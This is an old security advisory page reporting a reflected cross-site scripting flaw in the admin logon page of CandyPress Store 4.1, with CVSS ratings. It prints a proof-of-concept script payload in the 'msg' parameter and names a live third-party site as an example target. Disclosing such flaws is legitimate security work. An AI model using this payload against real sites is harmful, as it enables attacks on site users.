CandyPress Store 4.1 - XSS

2007-10-21 / 2007-10-22
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Product : CandyPress Store Version : 4.1 Bug Kind:XSS Vendor Site:http://www.candypress.com Discovered by: Snoop Security Researching Committee We Are: it's an Underground...so ssshh!!! no one know us... This Bug blog to : Snoop Security And darkness_king www.snoop-security.com !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ About Candypress: CandyPress Store is an eCommerce solution based on popular Microsoft technologies. It is designed to run on an IIS web server that is ASP and VBScript enabled. In addition, the software is designed to work with SQL Server or MS Access databases. The Bug is affected in here:/admin/logon.asp?msg=Snoop Security also this way:/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E some example vuln pages: http://www.ineedfrom.com/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top